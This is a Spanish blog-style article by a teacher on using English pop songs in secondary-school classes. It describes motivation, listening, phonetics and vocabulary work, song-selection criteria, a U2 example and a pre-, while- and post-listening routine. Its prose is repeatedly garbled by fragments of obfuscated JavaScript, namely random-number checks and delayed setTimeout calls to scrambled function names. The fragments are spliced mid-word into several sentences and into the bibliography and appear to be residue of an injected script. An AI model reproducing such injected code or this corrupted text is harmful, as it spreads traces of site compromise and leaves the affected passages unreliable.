LAS CANCIONES EN INGLÉS EN EL AULA DE SECUNDARIA

Autora: Inés Mª Pino Prado

El artículo trata de abordar el uso y práctica de las canciones en la clase de inglés para la educación secundaria. Trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con canciones la clase está más motivada y el aprendizaje del inglés se vuelve más divertido. Además de la importancia cultural que aportan dichas canciones, se trabajan otros aspectos como el vocabulario, la fonética que de otra manera, resultarían muy aburridas para nuestros alumnos/as. Así la motivación en el aula, está asegurada.


Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando fui alumna, no hace tantos años, una de mis actividades favoritas en la clase de inglés era que la profesora nos trajese una canción. Me encantaba y sobre todo si era una canción conocida por mí, (la mayoría de las veces). Aun recuerdo la famosa canción de Oasis “Wonderwall” o el “What can I do” de The Corrs que para mi eran un momento de relax más que una actividad de clase.

Una de las maneras más entretenidas de aprender inglés es esta. ¿A quien no le gusta escuchar música? Todos tenemos cantantes o grupos favoritos y encima el profesor puede inculcarnos una de las ya famosas competencias básicas “learning to learn”, es decir, “Aprender a aprender”.

Todos los alumnos tienen ídolos y les encanta saber qué significan las letras de sus canciones, que quieren transmitir, o el significado oculto de cierta canción. Por ejemplo, el primer disco de Maroon 5 llamado “Songs about Jane” oculta una historia de amor entre el cantante solista y la misteriosa Jane.

Por todos estos motivos, reivindico el uso de las canciones en inglés en el aula de secundaria, ya sea en ESO o Bachillerato.  Es verdad que la música pop actual es un recurso del que se puede obtener mucho provecho. Es una fuente de información sobre historias de la vida real, religión, y no solo podemos trabajar aspectos idiomáticos sino que también podemos enseñar aspectos culturales y de la vida que nos rodea. Además la motivación con el uso de las canciones aumenta, y no hay nada mejor que unos alumnos/as motivados para aprender un idioma.

Desde un punto de vista didáctico, el uso de canciones nos sirven como complemento de la enseñanza de un idioma extranjero, entre los que destacaría:

-Actividad de Listening: normalmente es una actividad muy aburrida y desmotivadora para nuestros alumnos, además de difícil. Con el uso de canciones que gusten a nuestros pupilos la motivación y el entretenimiento están asegurados.

-Actividad de Fonética y Rima: muchas veces con el uso de canciones podemos observar diferentes acentos (Británico, Americano) y el uso de la rima. Esto último es muy importante ya que así podemos practicar actividades de poesía en rima en Inglés.

-Actividad de Vocabulario: obviamente, se puede trabajar con el nuevo vocabulario aprendido y  a su vez hacernos de un pequeño cuaderno donde anotar el nuevo léxico.

Todo esto está muy bien, pero seguro que os preguntáis de qué modo se puede hacer una selección de canciones, qué criterios vamos a seguir. Los siguientes:

-Seguir los gustos de nuestros alumnos/as.

-Letras de canciones claras y nítidas.

- Canciones más o menos famosas o conocidas aunque sean antiguas.

Una canción que cumple todos los requisitos anteriormente citados y que yo utilizo en mi clase de Bachillerato es: “Bloody Sunday” de U2. Además, con esta canción yo les enseño la historia que hay detrás, (conflicto irlandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andés con el IRA,…) por lo que añado el factor cultura.

Pero aquí no termina todo, no es solo escuchar la canción y ya. El uso de este tipo de actividad nos puede llevar desde 20 minutos a un par de clases. Evidentemente, si queremos aprovechar todo el jugo que una canción puede ofrecernos, habrá que echarle un ratito. Todo depende del tiempo que dispongamos.  Por mi experiencia, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando trabajo con una canción suelo seguir los siguientes criterios:

-       Pre-listening activity: antes de escuchar la canción suelo preguntar a mis alumnos/as sobre el artista en cuestión, su vida, de dónde procede, si conocen su música, etc….

-       While-listening activity: durante la escucha, los alumnos realizan actividades tales como rellenar huecos, subrayar tiempos en pasado, buscar adjetivos, etc…

-       Post-listening activity: después de la escucha podemos intentar traducir la canción (aunque no soy muy partidaria pero los deseos de los alumnos/as me pueden a veces), analizar el tema, hacer trabajos de investigación, tales como biografías o incluso hacer un collage como hicimos un con un curso de la ESO sobre una canción de los Beatles “She loves you” con fotos de los cantantes.

Como podeis ver, muchas veces es una cuestión de imaginación más que de técnica. Hay miles de posibilidades y la música es una fuente infinita de recursos para trabajar en el aula. Por eso  animo a todos mis compañeros a que utilicen más este maravilloso recurso que nos hace trabajar mejor y con más rendimiento.

BIBLIOGRAFÍA

Lems, K. “For a song: Music across the ESL Curriculum”. Chicago, 1996 (ED N. 396 524).

Murphey, Tim. “Music andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and song”. Oxford, 1992.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.